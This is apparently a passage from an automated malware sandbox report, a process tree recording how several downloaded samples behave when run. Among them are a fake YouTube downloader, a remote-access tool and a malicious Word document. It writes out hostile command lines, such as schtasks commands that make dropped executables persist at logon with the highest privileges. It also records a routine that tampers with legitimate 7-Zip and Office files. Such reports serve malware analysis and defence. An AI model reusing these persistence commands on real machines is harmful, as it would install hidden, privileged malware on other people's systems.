  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:5020
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2456
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6628
- - C:\Users\Admin\Downloads\ArcticBomb.exe
    "C:\Users\Admin\Downloads\ArcticBomb.exe"
    3⤵
    - Executes dropped EXE
    PID:1352
- - C:\Users\Admin\Downloads\ArcticBomb.exe
    "C:\Users\Admin\Downloads\ArcticBomb.exe"
    3⤵
    - Executes dropped EXE
    PID:1560
- - C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe
    "C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    PID:6248
  - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe
      "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:2584
    - - C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe
        
        "C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe"
        5⤵
        Executes dropped EXE
        
        PID:648
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.supportforme.com/
        6⤵
        
        PID:740
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch --single-argument http://www.supportforme.com/
        7⤵
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:6808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ffd3f70f208,0x7ffd3f70f214,0x7ffd3f70f220
        8⤵
        
        PID:1720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=de --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1936,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=2312 /prefetch:3
        8⤵
        
        PID:6896
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2284,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:2
        8⤵
        
        PID:4348
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=de --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2600,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=2736 /prefetch:8
        8⤵
        
        PID:3140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3568,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=3612 /prefetch:1
        8⤵
        
        PID:6224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3576,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=3600 /prefetch:1
        8⤵
        
        PID:6732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4968,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
        8⤵
        
        PID:6524
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=de --js-flags=--ms-user-locale=de_DE --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4888,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=4884 /prefetch:1
        8⤵
        
        PID:2132
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=de --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5204,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=5228 /prefetch:8
        8⤵
        
        PID:7108
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=de --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5168,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=5264 /prefetch:8
        8⤵
        
        PID:4480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=de --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5640,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=5556 /prefetch:8
        8⤵
        
        PID:4288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=de --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5660,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
        8⤵
        
        PID:6496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=de --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5660,i,2223642185055455526,11974010310370622956,262144 --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
        8⤵
        
        PID:5072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
        8⤵
        Drops file in Program Files directory
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ffd3f70f208,0x7ffd3f70f214,0x7ffd3f70f220
        9⤵
        
        PID:7112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=de --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:3
        9⤵
        
        PID:5852
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2216,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:2
        9⤵
        
        PID:4408
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=de --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2584,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=2728 /prefetch:8
        9⤵
        
        PID:4652
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=de --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4436,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=4352 /prefetch:8
        9⤵
        
        PID:4028
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=de --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4440,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=4604 /prefetch:8
        9⤵
        
        PID:6088
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=de --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4440,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=4604 /prefetch:8
        9⤵
        
        PID:4140
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=de --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4600,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=4732 /prefetch:8
        9⤵
        
        PID:4912
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=de --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4704,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=4660 /prefetch:8
        9⤵
        
        PID:5200
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=de --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4696,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=4776 /prefetch:8
        9⤵
        
        PID:4404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=de --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4448,i,9324021942317351870,14179318102466881915,262144 --variations-seed-version --mojo-platform-channel-handle=3032 /prefetch:8
        9⤵
        
        PID:7164
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 7016 -prefsLen 36638 -prefMapHandle 6188 -prefMapSize 270279 -jsInitHandle 6164 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5288 -initialChannelId {23b808fc-b898-4134-ac95-0903fedab53e} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 12 tab
    3⤵
    - Checks processor information in registry
    PID:1736
- - C:\Users\Admin\Downloads\Zika.exe
    "C:\Users\Admin\Downloads\Zika.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - NTFS ADS
    - Suspicious use of AdjustPrivilegeToken
    PID:6088
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\7-Zip\7z.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:5016
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:2120
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\7-Zip\7zFM.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:1848
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:6004
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\7-Zip\7zG.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:1148
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:6288
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\7-Zip\Uninstall.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:2632
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:416
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -addoverwrite C:\Program Files\7-Zip\Uninstall.exe", "C:\Program Files\7-Zip\Uninstall.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res, icongroup,,
      4⤵
      Executes dropped EXE
      Drops file in Program Files directory
      PID:6476
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:4280
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:5500
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:4656
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:6816
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:2384
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:3604
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:1656
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:812
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:312
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\svchost.exe" -extract C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.dll.sys.exe, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, icongroup,,
      4⤵
      Executes dropped EXE
      PID:4392
  - - C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe
      "C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\taskhost.exe" -compile C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.rc, C:\Users\Admin\AppData\Local\Temp\bc5e5c00997d494cbd02bc272851bf16\icons.res
      4⤵
      Executes dropped EXE
      PID:7116

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2804

C:\ProgramData\Windows\rutserv.exe
C:\ProgramData\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5076
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:3548
- - C:\ProgramData\Windows\rfusclient.exe
    C:\ProgramData\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: SetClipboardViewer
    PID:2928
- C:\ProgramData\Windows\rfusclient.exe
  C:\ProgramData\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:1344

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\metrofax.doc" /o ""
1⤵
- Blocklisted process makes network request
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1936
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:6668

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3220

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
1⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:6612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:6592

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4584

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4648

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7040

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:6708

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:7164

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:3160

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:5148

C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
1⤵
- Executes dropped EXE
PID:4708

C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
1⤵
- Executes dropped EXE
PID:6192

C:\Users\Admin\Downloads\ArcticBomb.exe
"C:\Users\Admin\Downloads\ArcticBomb.exe"
1⤵
- Executes dropped EXE
